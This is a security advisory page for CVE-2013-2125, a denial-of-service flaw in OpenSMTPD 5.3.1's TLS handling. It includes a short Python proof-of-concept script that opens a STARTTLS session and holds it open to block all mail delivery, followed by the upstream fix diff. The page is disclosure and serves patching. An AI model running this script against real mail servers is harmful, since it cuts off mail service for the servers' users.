OpenSMTPD TLS Support DoS

2013.05.19

Credit: Jason

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2013-2125

CWE: CWE-310

Ogólna skala CVSS: 5/10

Znaczenie: 2.9/10

Łatwość wykorzystania: 10/10

Wymagany dostęp: Zdalny

Złożoność ataku: Niska

Autoryzacja: Nie wymagana

Wpływ na poufność: Brak

Wpływ na integralność: Brak

Wpływ na dostępność: Częściowy

The SSL handling in the latest OpenSMTPD (5.3.1) misconfigures its
sockets in blocking mode, allowing an attacker to prevent all mail
delivery simply by holding a socket open.
I discovered this accidentally, as I noticed my HP printer's smtp
client would keep the connection indefinitely open after an
unsuccessful authentication attempt, causing no more mail to be
delivered until I SIGKILL'd my smtpd process or unplugged my printer.
The following reproduces the attack trivially:
#!/usr/bin/env python2
import smtplib
import time
print "[+] Connecting to server and initiating TLS"
smtp = smtplib.SMTP("mail.some-vitim-host.blah", 587)
smtp.starttls()
print "[+] No clients will be able to connect as long as this remains open."
time.sleep(100000000)
Apparently this was fixed recently upstream, noting "evil client" in
the commit message:
http://git.zx2c4.com/OpenSMTPD/commit/?id=38b26921bad5fe24ad747bf9d591330d683728b0
A snapshot has been posted to http://www.opensmtpd.org/archives/ , but
no patch release has yet been made.
diff --git a/smtpd/ioev.c b/smtpd/ioev.c
index fcd2452..5094cc4 100644
--- a/smtpd/ioev.c
+++ b/smtpd/ioev.c
@@ -678,11 +678,11 @@ io_start_tls(struct io *io, void *ssl)
if (mode == IO_WRITE) {
io->state = IO_STATE_CONNECT_SSL;
SSL_set_connect_state(io->ssl);
- io_reset(io, EV_READ | EV_WRITE, io_dispatch_connect_ssl);
+ io_reset(io, EV_WRITE, io_dispatch_connect_ssl);
} else {
io->state = IO_STATE_ACCEPT_SSL;
SSL_set_accept_state(io->ssl);
- io_reset(io, EV_READ | EV_WRITE, io_dispatch_accept_ssl);
+ io_reset(io, EV_READ, io_dispatch_accept_ssl);
}
return (0);
@@ -856,14 +856,16 @@ io_dispatch_write_ssl(int fd, short event, void *humppa)
void
io_reload_ssl(struct io *io)
{
- short ev = EV_READ|EV_WRITE;
+ short ev = 0;
void (*dispatch)(int, short, void*) = NULL;
switch (io->state) {
case IO_STATE_CONNECT_SSL:
+ ev = EV_WRITE;
dispatch = io_dispatch_connect_ssl;
break;
case IO_STATE_ACCEPT_SSL:
+ ev = EV_READ;
dispatch = io_dispatch_accept_ssl;
break;
case IO_STATE_UP:
diff --git a/smtpd/smtp.c b/smtpd/smtp.c
index 55f8772..a306baa 100644
--- a/smtpd/smtp.c
+++ b/smtpd/smtp.c
@@ -442,6 +442,7 @@ smtp_accept(int fd, short event, void *p)
close(sock);
return;
}
+ io_set_blocking(sock, 0);
sessions++;
stat_increment("smtp.session", 1);
Jason

Referencje:

http://git.zx2c4.com/OpenSMTPD/commit/?id=38b26921bad5fe24ad747bf9d591330d683728b0

http://seclists.org/oss-sec/2013/q2/366

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

OpenSMTPD TLS Support DoS

Referencje:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.